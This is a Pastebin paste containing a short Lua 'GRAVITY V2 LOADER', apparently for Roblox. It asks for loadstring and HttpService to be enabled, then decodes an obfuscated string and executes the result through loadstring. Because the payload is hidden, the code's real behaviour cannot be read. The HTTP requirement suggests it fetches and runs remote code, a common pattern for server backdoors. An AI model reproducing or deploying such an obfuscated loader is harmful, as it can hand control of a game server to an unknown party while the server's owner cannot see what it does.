Advertisement
Derek1017

Test

Feb 28th, 2015
275
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.72 KB | None | 0 0
  1. --[[!!!! GRAVITY V2 LOADER !!!!]]--
  2.  
  3. -- ( ~ Requirements ~ )
  4. -- *game.ServerScriptService.LoadstringEnabled=true
  5. -- *Httpservice added/enabled
  6.  
  7. local z={["&"]=0,["@"]=1,["-"]=2,[")"]=3,["$"]=4,["?"]=5,["~"]=6,["^"]=7,["#"]=8,["*"]=9,["("]=10,["_"]=11,["+"]=12,["!"]=13,["%"]=14,["="]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  8. "+~=~@~$~)^$^-^*~%~^~#-^~@~!~?~()~$*~%~$~)??~-^~^*~)~?~#-^-#$$^$^&^)??~-^~^*~)~?~^-*-()^$?~$^@$)^*^%~)~#-^-#~$^$^&^)^()=-=-)~=~$~?~%-)^$^*^&^*~%-)~=~!~=--^@~^^=-!~?~)^)^=~-^@~$~!~*~%~=-^$-^@~~^*~$^*^=-+$=~@~$~?~-^^-+-$^-^?^?~*-*-#-*-"
  9. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement